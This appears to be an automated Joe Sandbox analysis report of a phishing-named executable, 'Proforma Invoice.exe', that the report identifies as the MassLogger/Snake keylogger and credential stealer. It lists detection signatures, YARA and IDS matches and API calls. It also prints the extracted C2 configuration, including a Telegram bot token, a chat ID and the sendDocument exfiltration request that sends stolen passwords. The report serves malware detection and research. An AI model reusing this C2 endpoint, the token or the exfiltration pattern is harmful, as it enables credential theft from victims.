Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Proforma Invoice.exe

Overview

General Information

Sample name:Proforma Invoice.exe
Analysis ID:1580085
MD5:58d259f56b4715bcea1ddebbc2735eb2
SHA1:70ed1319ecebab15376dca298c0add6884c1f7f6
SHA256:d88aeea1b3297511f942b7caab86deab58ed647d5a6bbce0844b83481dd259a7
Tags:exeuser-TeamDreier
Infos:

Detection

MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code references suspicious native API functions
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Proforma Invoice.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\Proforma Invoice.exe" MD5: 58D259F56B4715BCEA1DDEBBC2735EB2)
    • RegSvcs.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\Proforma Invoice.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg", "Telegram Chatid": "5839829477"}
SourceRuleDescriptionAuthorStrings
00000001.00000002.4215515073.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000001.00000002.4215515073.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000001.00000002.4215515073.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000001.00000002.4215515073.0000000000402000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0xef73:$a1: get_encryptedPassword
        • 0xf29b:$a2: get_encryptedUsername
        • 0xed0e:$a3: get_timePasswordChanged
        • 0xee2f:$a4: get_passwordField
        • 0xef89:$a5: set_encryptedPassword
        • 0x108e5:$a7: get_logins
        • 0x10596:$a8: GetOutlookPasswords
        • 0x10388:$a9: StartKeylogger
        • 0x10835:$a10: KeyLoggerEventArgs
        • 0x103e5:$a11: KeyLoggerEventArgsEventHandler
        00000000.00000002.1769500519.0000000001E60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
          Click to see the 15 entries
          SourceRuleDescriptionAuthorStrings
          1.2.RegSvcs.exe.400000.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            1.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              1.2.RegSvcs.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                1.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0xf173:$a1: get_encryptedPassword
                • 0xf49b:$a2: get_encryptedUsername
                • 0xef0e:$a3: get_timePasswordChanged
                • 0xf02f:$a4: get_passwordField
                • 0xf189:$a5: set_encryptedPassword
                • 0x10ae5:$a7: get_logins
                • 0x10796:$a8: GetOutlookPasswords
                • 0x10588:$a9: StartKeylogger
                • 0x10a35:$a10: KeyLoggerEventArgs
                • 0x105e5:$a11: KeyLoggerEventArgsEventHandler
                1.2.RegSvcs.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x13931:$a4: \Orbitum\User Data\Default\Login Data
                • 0x14729:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 10 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T21:50:22.759148+010020577441Malware Command and Control Activity Detected192.168.2.449732149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T21:50:12.980194+010028032742Potentially Bad Traffic192.168.2.449730193.122.6.16880TCP
                2024-12-23T21:50:20.370754+010028032742Potentially Bad Traffic192.168.2.449730193.122.6.16880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T21:50:21.959607+010018100081Potentially Bad Traffic192.168.2.449732149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000001.00000002.4216346327.00000000031BA000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg", "Telegram Chatid": "5839829477"}
                Source: RegSvcs.exe.7324.1.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendMessage"}
                Source: Proforma Invoice.exeReversingLabs: Detection: 52%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Proforma Invoice.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Proforma Invoice.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49731 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: Binary string: wntdll.pdbUGP source: Proforma Invoice.exe, 00000000.00000003.1767012334.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000003.1766560373.0000000003D30000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Proforma Invoice.exe, 00000000.00000003.1767012334.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000003.1766560373.0000000003D30000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_0070445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0070445A
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_0070C6D1 FindFirstFileW,FindClose,0_2_0070C6D1
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_0070C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0070C75C
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_0070EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0070EF95
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_0070F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0070F0F2
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_0070F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0070F3F3
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_007037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007037EF
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_00703B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00703B12
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_0070BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0070BCBC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05690A1Ah1_2_05690600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 056902F1h1_2_05690040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0569C34Dh1_2_0569C010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05690A1Ah1_2_056905F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0569E868h1_2_0569E5C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0569D708h1_2_0569D460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0569BA09h1_2_0569B760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0569E410h1_2_0569E168
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0569B5B1h1_2_0569B308
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0569DFB8h1_2_0569DD10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0569B159h1_2_0569AEB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05690A1Ah1_2_05690947
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0569DB60h1_2_0569D8B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0569BE61h1_2_0569BBB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0569AD01h1_2_0569AA58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0569ECC0h1_2_0569EA18

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49732 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49732 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd236981062ef2Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
                Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 193.122.6.168:80
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49731 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_007122EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_007122EE
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: unknownHTTP traffic detected: POST /bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd236981062ef2Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
                Source: RegSvcs.exe, 00000001.00000002.4216346327.00000000031BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: RegSvcs.exe, 00000001.00000002.4216346327.0000000003110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: RegSvcs.exe, 00000001.00000002.4216346327.0000000003110000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4216346327.0000000003104000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4216346327.00000000031BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: RegSvcs.exe, 00000001.00000002.4216346327.0000000003091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: Proforma Invoice.exe, 00000000.00000002.1769500519.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4215515073.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: RegSvcs.exe, 00000001.00000002.4216346327.0000000003132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: RegSvcs.exe, 00000001.00000002.4216346327.0000000003091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RegSvcs.exe, 00000001.00000002.4216346327.00000000031BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: RegSvcs.exe, 00000001.00000002.4216346327.00000000031BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: Proforma Invoice.exe, 00000000.00000002.1769500519.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4215515073.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                Source: RegSvcs.exe, 00000001.00000002.4216346327.00000000031BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839
                Source: RegSvcs.exe, 00000001.00000002.4216346327.00000000031BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org8
                Source: RegSvcs.exe, 00000001.00000002.4216346327.0000000003110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: Proforma Invoice.exe, 00000000.00000002.1769500519.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4216346327.0000000003110000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4215515073.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: RegSvcs.exe, 00000001.00000002.4216346327.0000000003110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: 0.2.Proforma Invoice.exe.1e60000.1.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_00714164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00714164
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_00714164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00714164
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_00713F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00713F66
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_0070001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0070001C
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_0072CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0072CABC

                System Summary

                barindex
                Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Proforma Invoice.exe.1e60000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Proforma Invoice.exe.1e60000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Proforma Invoice.exe.1e60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Proforma Invoice.exe.1e60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000001.00000002.4215515073.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1769500519.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1769500519.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: Process Memory Space: Proforma Invoice.exe PID: 7308, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 7324, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: This is a third-party compiled AutoIt script.0_2_006A3B3A
                Source: Proforma Invoice.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Proforma Invoice.exe, 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c405712f-7
                Source: Proforma Invoice.exe, 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_a7c062bc-5
                Source: Proforma Invoice.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0a56c18e-3
                Source: Proforma Invoice.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_cc4d4d90-c
                Source: initial sampleStatic PE information: Filename: Proforma Invoice.exe
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_0070A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0070A1EF
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006F8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_006F8310
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_007051BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_007051BD
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006AE6A00_2_006AE6A0
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006CD9750_2_006CD975
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006C21C50_2_006C21C5
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006D62D20_2_006D62D2
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_007203DA0_2_007203DA
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006D242E0_2_006D242E
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006C25FA0_2_006C25FA
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006FE6160_2_006FE616
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006B66E10_2_006B66E1
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006D878F0_2_006D878F
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_007208570_2_00720857
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006D68440_2_006D6844
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006B88080_2_006B8808
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_007088890_2_00708889
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006CCB210_2_006CCB21
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006D6DB60_2_006D6DB6
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006B6F9E0_2_006B6F9E
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006B30300_2_006B3030
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006CF1D90_2_006CF1D9
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006C31870_2_006C3187
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006A12870_2_006A1287
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006C14840_2_006C1484
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006B55200_2_006B5520
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006C76960_2_006C7696
                Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_006B57600_2_006B5760
